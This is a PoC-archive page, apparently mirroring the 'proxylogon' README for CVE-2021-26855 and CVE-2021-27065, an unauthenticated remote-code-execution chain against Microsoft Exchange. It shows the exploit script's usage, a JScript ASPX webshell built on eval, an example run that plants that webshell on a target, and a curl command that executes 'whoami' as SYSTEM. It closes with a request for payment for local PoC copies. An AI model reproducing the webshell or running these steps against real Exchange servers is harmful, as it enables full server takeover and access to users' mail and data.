Related vulnerability
Title: Microsoft Exchange Server code issue vulnerability (CVE-2021-26855)
Description: Microsoft Exchange Server is an email server product from Microsoft Corporation of the United States. It provides mail access, storage and forwarding, voice mail, mail filtering and similar functions. A Microsoft Exchange Server security vulnerability. An attacker can craft malicious HTTP requests and authenticate through the Exchange Server, then scan the internal network and obtain sensitive user information. The following products and versions are affected: Microsoft Exchange Server 2013 Cumulative Update 23, Microsoft Exchange
Description
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.
Introduction
# proxylogon
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065, which allows for
unauthenticated remote code execution on Microsoft Exchange as described in the
following resources:
* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers
* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities
* https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits
## Usage
Exploitation requires knowledge of the frontend Exchange server URL (e.g.
`https://exchange.example.org`) and an email address for a user on the system.
The admin SID and backend can be leaked from the server.
```
$ python exploit.py -h
usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID]
                  [--webshell WEBSHELL] [--path PATH]
                  [--backend BACKEND]
                  [--proxy PROXY]

proxylogon proof-of-concept

optional arguments:
  -h, --help           show this help message and exit
  --frontend FRONTEND  external url to exchange (e.g. https://exchange.example.org)
  --email EMAIL        valid email on the target machine
  --sid SID            exchange admin sid
  --webshell WEBSHELL  webshell to upload
  --path PATH          desired path to webshell on host
  --backend BACKEND    [optional] backend host (leaked in X-CalculatedBETarget)
  --proxy PROXY        [optional] proxy traffic (e.g. http://127.0.0.1:8080)
```
## Example
```
$ cat <<EOF > webshell.aspx
<script language="JScript" runat="server">
function Page_Load(){
eval(Request["kxpprfgvnosz"],"unsafe");
}
</script>
EOF
$ python exploit.py --frontend https://172.16.59.7 --backend exchange.hafnium.local \
--email administrator@hafnium.local \
--webshell webshell.aspx \
--path 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\o.aspx'
Retrieving backend via RPC
Backend: exchange.corp.contoso.com
Identified SID: S-1-5-21-...-500
Admin SID: S-1-5-21-...-500
Authenticating via proxylogon
Looking up OAB virtual directory
OAB virtual directory: OAB (Default Web Site)
Injecting payload into OAB ExternalUrl
Resetting OAB virtual directory
Enjoy your webshell!
$ curl -s -k https://172.16.59.7/ecp/auth/o.aspx \
-d 'kxpprfgvnosz=Response.Write(
new ActiveXObject("WScript.Shell")
.Exec("cmd /c whoami")
.StdOut
.ReadAll()
);' | head -n 1
nt authority\system
```
File snapshot
[4.0K] /data/pocs/f3d49719a80b23c1e496a32e85483c5ebfbe94d6
├── [8.3K] exploit.py
├── [ 11K] LICENSE
├── [2.4K] README.md
└── [ 8] requirements.txt
0 directories, 4 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be accessed, please send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.